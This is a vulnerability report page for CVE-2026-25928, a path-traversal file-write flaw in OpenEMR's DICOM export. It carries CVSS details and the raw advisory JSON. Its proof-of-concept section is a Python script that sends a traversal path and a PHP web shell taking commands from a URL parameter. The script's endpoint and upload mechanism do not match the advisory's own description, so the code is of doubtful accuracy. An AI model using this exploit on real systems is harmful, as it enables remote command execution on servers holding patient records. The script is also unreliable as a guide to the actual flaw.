Security Vulnerability Report
CVE-2026-25928 CVSS 6.5 MEDIUM

CVE-2026-25928

Published: 2026-03-19 20:16:14
Last Modified: 2026-03-20 17:18:36

Description

OpenEMR is a free and open source electronic health records and medical practice management application. Prior to 8.0.0.2, the DICOM zip/export feature uses a user-supplied destination or path component when creating the zip file, without sanitizing path traversal sequences (e.g. `../`). An attacker with DICOM upload/export permission can write files outside the intended directory, potentially under the web root, leading to arbitrary file write and possibly remote code execution if PHP or other executable files can be written. Version 8.0.0.2 fixes the issue.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* - VULNERABLE
OpenEMR < 8.0.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL of the vulnerable OpenEMR instance
target_url = "http://example.com/openemr/interface/dicom/dicom_export.php"

# Attacker's session cookie (obtained after login)
cookies = {
    "OpenEMR": "attacker_session_cookie_value"
}

# Payload exploiting path traversal to write a PHP shell
# The application uses the 'path' parameter to determine the zip destination
exploit_data = {
    "path": "../../../../var/www/html/exploit.php",  # Path traversal sequence
    "format": "zip"
}

# Malicious file content to be written (simple PHP shell)
files = {
    "file": ("exploit.php", "<?php system($_GET['cmd']); ?>", "application/x-php")
}

try:
    response = requests.post(target_url, data=exploit_data, files=files, cookies=cookies)
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Check the web root for the shell: http://example.com/exploit.php?cmd=whoami")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-25928", "sourceIdentifier": "[email protected]", "published": "2026-03-19T20:16:13.720", "lastModified": "2026-03-20T17:18:35.600", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenEMR is a free and open source electronic health records and medical practice management application. Prior to 8.0.0.2, the DICOM zip/export feature uses a user-supplied destination or path component when creating the zip file, without sanitizing path traversal sequences (e.g. `../`). An attacker with DICOM upload/export permission can write files outside the intended directory, potentially under the web root, leading to arbitrary file write and possibly remote code execution if PHP or other executable files can be written. Version 8.0.0.2 fixes the issue."}, {"lang": "es", "value": "OpenEMR es una aplicación de código abierto y gratuita para registros de salud electrónicos y gestión de consultorios médicos. Antes de la 8.0.0.2, la función de compresión/exportación DICOM utiliza un destino o componente de ruta proporcionado por el usuario al crear el archivo zip, sin sanear las secuencias de salto de ruta (por ejemplo, '../'). Un atacante con permiso de carga/exportación DICOM puede escribir archivos fuera del directorio previsto, potencialmente bajo la raíz web, lo que lleva a una escritura de archivos arbitraria y posiblemente a una ejecución remota de código si se pueden escribir archivos PHP u otros archivos ejecutables. La versión 8.0.0.2 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:*", "versionEndExcluding": "8.0.0.2", "matchCriteriaId": "C78F19AD-BD18-4F61-8B1C-DD099DBC6D34"}]}]}], "references": [{"url": "https://github.com/openemr/openemr/commit/ddcf04ea769a33cdc1932355224575478df70585", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openemr/openemr/security/advisories/GHSA-rppw-f689-6hrm", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}